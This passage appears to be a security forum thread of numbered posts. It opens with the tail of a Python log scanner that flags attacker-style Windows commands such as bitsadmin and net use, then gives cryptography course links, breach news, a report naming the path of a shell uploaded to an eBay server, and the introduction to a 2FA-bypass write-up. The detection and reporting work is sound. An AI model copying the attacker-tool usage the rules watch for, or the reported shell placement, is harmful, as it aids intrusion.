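    return dict(Counter(host for _lineno, host, _rule in hits))


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Several different rules firing on one host within minutes, as on both constructed hosts here, is a stronger signal than any single match, since administrators also run `bitsadmin`, `net use` and `csc.exe` legitimately.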
  11. Ancient cryptography
      Explore how we have hidden secret messages through history.
      What is cryptography?; The Caesar cipher; Caesar Cipher Exploration; Frequency Fingerprint Exploration; Polyalphabetic cipher; Polyalphabetic Exploration; The one-time pad; Perfect Secrecy Exploration; Frequency stability; Frequency stability exploration; Coin flip sequences; The Enigma encryption machine; Perfect secrecy; Pseudorandom number generators; Random Walk Exploration

      Modern cryptography
      A new problem emerges in the 20th century. What happens if Alice and Bob can never meet to share a key in the first place?
      The fundamental theorem of arithmetic; Public key cryptography: What is it?; The discrete logarithm problem; Diffie-Hellman key exchange; RSA encryption: Step 1; RSA encryption: Step 2; RSA encryption: Step 3; Time Complexity (Exploration); Euler's totient function; Euler Totient Exploration; RSA encryption: Step 4; What should we learn next?

      Ciphers
      Learn about algorithms for performing encryption & decryption. Then practice making and breaking codes!
      Ciphers vs. codes; Shift cipher; Caesar cipher encryption; Caesar cipher decryption; Caesar cipher frequency analysis; Vigenere cipher encryption; XOR bitwise operation; XOR and the one-time pad; XOR exploration; Bitwise operators; What's next?

      Modular arithmetic
      This is a system of arithmetic for integers. These lessons provide a foundation for the mathematics presented in the Modern Cryptography tutorial.
      What is modular arithmetic?; Modulo operator; Congruence modulo; Congruence relation; Equivalence relations; The quotient remainder theorem; Modular addition and subtraction; Modular addition; Modular multiplication; Modular multiplication; Modular exponentiation; Fast modular exponentiation; Fast Modular Exponentiation; Modular inverses; The Euclidean Algorithm

      Primality test
      Why do Primes make some problems fundamentally hard? Build machines to perform primality tests!
      Introduction; Primality test challenge; Trial division; Running time; Level 2: measuring running time; Computer memory (space); Binary memory exploration; Algorithmic efficiency; Level 3: Challenge; Sieve of Eratosthenes; Level 4: Sieve of Eratosthenes; Primality test with sieve; Level 5: Trial division using sieve; The prime number theorem; Prime density spiral; Prime Gaps; Time space tradeoff; Summary (what's next?)

      Randomized algorithms
      Would access to coin flips speed up a primality test? How would this work?
      Randomized algorithms (intro); Conditional probability warmup; Guess the coin; Random primality test (warm up); Level 9: Trial Division vs Random Division; Fermat's little theorem; Fermat primality test; Level 10: Fermat Primality Test

      Link: https://www.khanacademy.org/computing/computer-science/cryptography
  12. More than 1.2 million account credentials from Origin, the popular Electronic Arts game-platform, have been leaked online, according to an announcement made by the hackers. The Origin client is the exclusive game-selling platform from all EA games. The leak contained 1.218.229 emails and plain text passwords of Origin users. “Origin has been breached by #UGLegion,” the hackers said. “-37MB’s of ORIGIN Users; – 1.2million in total.” Of particular significance is that the Origin client also has a payment section that could easily be populated with payment details. The credit card payment section usually contains credit card numbers, credit card security code (CSC) or credit card verification value (CVV), expiration dates, and names, addresses and phone numbers. It can also contain a linked PayPal account for payment processing. In a separate development the UGLegion hackers group also announced a leak of close to a million emails that are linked to Facebook. “Facebook has been deemed, Greedy,” the hackers said. “1million emails – breached from Facebook.” This may be the biggest leak that Electronic Arts has suffered since launching the Origin Platform in June, 2011. Source: Origin Client Database Breached by Hackers; 1.2 Million Accounts and Passwords Leaked | HOTforSecurity
  13. Usr6

    CTF Field Guide

    In these chapters, you’ll find everything you need to win your next CTF competition:
      • Walkthroughs and details on past CTF challenges
      • Guidance to help you design and create your own toolkits
      • Case studies of attacker behavior, both in the real world and in past CTF competitions
    https://trailofbits.github.io/ctf/
  14. A simple script for "encryption", in Python 2.7.

    # Fixed one-to-one substitution table: each supported character maps to one symbol
    dictionar = {"a": "1", "b": "2", "c": "3", "d": "4", "e": "5", "f": "6", "g": "7",
                 "h": "8", "i": "9", "j": "~", "k": "!", "l": "@", "m": "#", "n": "$",
                 "o": "%", "p": "^", "q": ":", "r": "&", "s": "*", "t": "+", "u": "=",
                 "v": "|", "w": "_", "x": ".", "y": ",", "z": "0", " ": "`", "?": ">"}
    text = "salut ce faci?"
    textcriptat = ""
    for i in text:
        if i in dictionar:
            # look up the replacement for this character
            textcriptat += dictionar[i]
        else:
            # characters missing from the table are reported and skipped
            print("n-am gasit inlocuitor pentru: " + str(i))
    print(textcriptat)
  15. The National Security Agency (NSA) is collecting a huge number of images from the communications it intercepts through its surveillance operations in order to use them in sophisticated facial recognition programs, the New York Times reports in its online edition. The agency's reliance on facial recognition technology has grown significantly over the last four years, as the NSA has turned to new software to exploit the numerous images included in emails, text messages, social networks, videoconferences and other communications, according to secret documents. The agency intercepts "millions of images per day", which translate into a "tremendous untapped potential", according to documents from 2011 obtained by former consultant Edward Snowden. While it once focused on written and spoken communications, the NSA now considers facial images, fingerprints and other identifiers just as important to its mission of tracking terrorism suspects and other intelligence targets, the documents show. A 2011 NSA PowerPoint presentation, for example, shows several photographs of an unidentified man - sometimes bearded, sometimes clean-shaven - in different settings, alongside more than 20 sets of information about him, such as whether he was on the Transportation Security Administration's no-fly list, the status of his passport or visa, associates known or suspected of terrorist ties, and comments made about him by informants of the American intelligence agencies. It is not known exactly how many people in the world and how many Americans have been targeted by these techniques. Neither federal nor state laws provide specific protection for facial images.
Given the NSA's foreign intelligence missions, many of these images would involve people outside the United States whose data was gathered through taps on transport cables, Internet hubs and satellite transmissions. Because the agency considers images a form of communications content, the NSA would have to seek a court's approval for images of Americans collected through its surveillance programs, just as it would for reading their emails or intercepting their phone conversations, according to an NSA spokeswoman. International communications in which an American might send an image to someone abroad who is being tracked by the agency could be exempt from these provisions. Civil liberties advocates and other critics are concerned that the improving technology, used by government and industry, could affect privacy. "Facial recognition can be very invasive," said Alessandro Acquisti, a researcher in facial recognition technology at Carnegie Mellon University. "There are still technical limitations in this respect, but computing power keeps growing, the databases keep growing, and the algorithms keep improving."
    Source: NSA adună milioane de imagini de pe Internet pentru a le folosi în programe de recunoaștere facială - Mediafax
  16. + = http://i.imgur.com/cHbQKWS.png
  17. Usr6

    RegExr

    Learn, build and test regular expressions: RegExr: Learn, Build, & Test RegEx
  18. Crypto researchers are preparing to scatter the ashes of a class of Discrete Logarithm Problems (DLPs) as the future of security, following a claim by Swiss researchers to have cracked a 128-bit crypto scheme in two hours. So as not to frighten the horses, The Register will start by pointing out that our understanding of this paper at Arxiv doesn't mean the schemes you're now using have been broken. Rather, the work by researchers at EPFL in Switzerland excludes crypto based on “supersingular curves” from future consideration. As the Lausanne-based polytechnic states in its media release, “Whereas it was believed that it would take 40,000 times the age of the universe for all computers on the planet to do it”, the supersingular curve DLP algorithm only lasted two hours on the 24-core cluster used to crack it. Authored by Robert Granger and Thorsten Kleinjung of EPFL's LACAL (Laboratory for Cryptologic Algorithms) and Jens Zumbrägel of TU Dresden, the paper says this about the cracking of supersingular curves: “When initially proposed, these fields were believed to be 128-bit secure, and even in light of the recent algorithmic advances, were believed to be 128-bit and 94.6-bit secure. On the contrary, we have shown that the former field has only 59 bits of security and we have implemented a total break of the latter. Since asymptotically more efficient techniques can be brought to bear as bit lengths increase, we conclude that small characteristic pairings at all security levels should now be regarded as completely insecure.” Their results are to be presented at IACR Crypto 2014 conference. ®
    Source: 128-bit crypto scheme allegedly cracked in two hours • The Register
  19. Jordan Jones (@CEHSecurity), a security researcher, claims to have discovered a critical security vulnerability in the eBay website for employees that allowed him to upload a backdoor shell. Jordan said in his tweet that he notified eBay about the vulnerability. A screenshot published in his Twitter account shows that he is able to upload a 'shell.php' file in the following location: "https://dsl.ebay.com/wp-includes/Text/Diff/Engine/shell.php" At the time of writing, the file is still there. The last modified date of the file is December 2012. It is quite possible to modify the timestamp. So, we are not sure since when the file has been there. Trying to access the shell ends up in a blank page. It means either the researcher has modified the shell to run only when a particular input is passed or it is not a shell. Jordan has also discovered a cross-site scripting vulnerability in the eBay Research Labs page (labs.ebay.com).
    Source: Researcher finds vulnerability in eBay and claims he uploaded a shell - E Hacker News
  20. Auction site eBay is forcing users to change their passwords after a cyber-attack compromised its systems. The US firm said a database had been hacked between late February and early March, and had contained encrypted passwords and other non-financial data. The company added that it had no evidence of there being unauthorised activity on its members' accounts. However, it said that changing the passwords was "best practice and will help enhance security for eBay users". Cyberattackers compromised a small number of employee log-in credentials, allowing unauthorized access to eBay’s corporate network, the company said. Working with law enforcement and leading security experts, the company is aggressively investigating the matter and applying the best forensics tools and practices to protect customers. The database, which was compromised between late February and early March, included eBay customers’ name, encrypted password, email address, physical address, phone number and date of birth. However, the database did not contain financial information or other confidential personal information. The company said that the compromised employee log-in credentials were first detected about two weeks ago. Extensive forensics subsequently identified the compromised eBay database, resulting in the company’s announcement today. The company said it has seen no indication of increased fraudulent account activity on eBay. The company also said it has no evidence of unauthorized access or compromises to personal or financial information for PayPal users. PayPal data is stored separately on a secure network, and all PayPal financial information is encrypted. Beginning later today, eBay users will be notified via email, site communications and other marketing channels to change their password. In addition to asking users to change their eBay password, the company said it also is encouraging any eBay user who utilized the same password on other sites to change those passwords, too. 
The same password should never be used across multiple sites or accounts.
    Sources: BBC News - eBay makes users change their passwords after hack; eBay Inc. To Ask eBay Users To Change Passwords | ebay inc
  21. C decompiler online: Retargetable Decompiler //does not decompile C++, @nedo tested it
  22. The Chinese government has banned the installation of Windows 8 on government PCs, reports Re/code. The Central Government Procurement Center issued a directive last week barring the use of Microsoft's latest operating system as an energy-saving measure, according to Re/code. State news agency Xinhua gave a different reason for the ban: it's to ensure system security after Microsoft ended support for Windows XP. The unsupported operating system is still estimated to be used on as much as half of the Chinese desktop market. How the ban makes sense, either as a security measure or an energy-saving one, isn't clear. Lest there be any doubt, the solution to Windows XP's security problems—it's vulnerable to a number of unpatched flaws already—is to stop using it. Not ban the use of an actively supported operating system.
    Source: China bans Windows 8 on government PCs to ensure security | Ars Technica
    On the same topic: China bans government purchases of Windows 8, surprising Microsoft | ITworld http://thehackernews.com/2014/05/china-bans-microsoft-windows-8-for.html
  23. Usr6

    Shared secret

    "what stops them from finding out the password before his death?" I dissected the problem together with @em he is alive, the site's logs show him that someone is brute-forcing. In response he can change the password and the two will be left empty-handed, after which he finds 2 other people to entrust the secret to.
  24. Usr6

    Fun stuff

  25. I remember fondly two years ago, when 2-Factor-Authentication (2FA) became popular and well used across major web applications (Google, Facebook, Yahoo and others). I found my naive sixteen-year-old self unable to come to terms with why the genius idea had not been thought of before. At the time, I felt that 2FA was that golden shield you could cover yourself with and defend against some of the most sophisticated phishing attacks calmly. Whilst 2FA can still be that golden shield to the critical applications you use in your life, I shall be documenting below - using an array of exploitation methods, how I was able to bypass 2FA for Google, Facebook, Yahoo, LinkedIn and basically any service which sends 2FA tokens to voicemail. Note: More than 9.59 million Australian Optus mobile subscribers are affected by the voicemail hack I detail below. Anyone from that 9.59 million with 2FA enabled, is vulnerable to the 2FA bypass I document below.
    Table of Contents
      • Analysis of 2FA, Concept and Flow of Exploit
      • Disclosure to Google Security Team
      • Disclosure to Facebook Security Team
      • Disclosure to LinkedIn Security Team
      • Disclosure to Yahoo Security Team
      • Disclosure to Authy & Duosecurity - (Universal 2FA Provider) - Not Vulnerable
      • Mitigation Techniques and Disclosures to Telco's
      • Final notes
    Full article: How I bypassed 2-Factor-Authentication on Google, Facebook, Yahoo, LinkedIn, and many others.